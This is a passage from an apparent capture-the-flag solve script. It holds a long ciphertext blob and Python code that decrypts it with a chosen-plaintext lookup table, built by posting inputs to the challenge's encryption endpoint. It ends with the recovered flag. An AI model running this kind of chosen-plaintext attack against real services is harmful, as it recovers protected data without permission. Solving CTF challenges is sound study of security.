9\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\
R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S34|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|S04\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\E25|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|H09|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29\_23\A30|A30\_33\
T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\V24\Y38\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\Y32|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|H09|H09\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\
R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\Y32|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|{07\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\_23\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19|_33|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|V24\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\
T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\C15|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29\_23\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|S31|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S22|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\
R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29|N14\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|H09\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\_23|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\I21\A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\
T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|{07|_20\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\S34|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27\S34|A30\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30\V24\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33|T19\_20|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\
R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|_28\R26\A30|A30\_33\T19\T19|Y27|E29|A30|}39"
# enc_list[n] is the 4-character ciphertext the service returned for table[n].
# The values are hard-coded above; the commented-out loop below is how they
# were collected in the first place.
# for i in table:
# 	r = post("http://1.224.175.24:30368/index.php?page=encrypt", {"str" : i})
# 	enc_list.append(r.text)

# Map every 4-character chunk of enc back to its plaintext character.
dec = ''.join(
	table[enc_list.index(enc[pos:pos + 4])]
	for pos in range(0, len(enc), 4)
)

# Decode with the custom alphabet, reverse, and drop the filler characters.
print(base64_decode(dec)[::-1].replace(',', '').replace('0', '').replace('@', ''))

CATSEC{THIS_ENCRYPT_IS_VERY_EASY_SORRY}
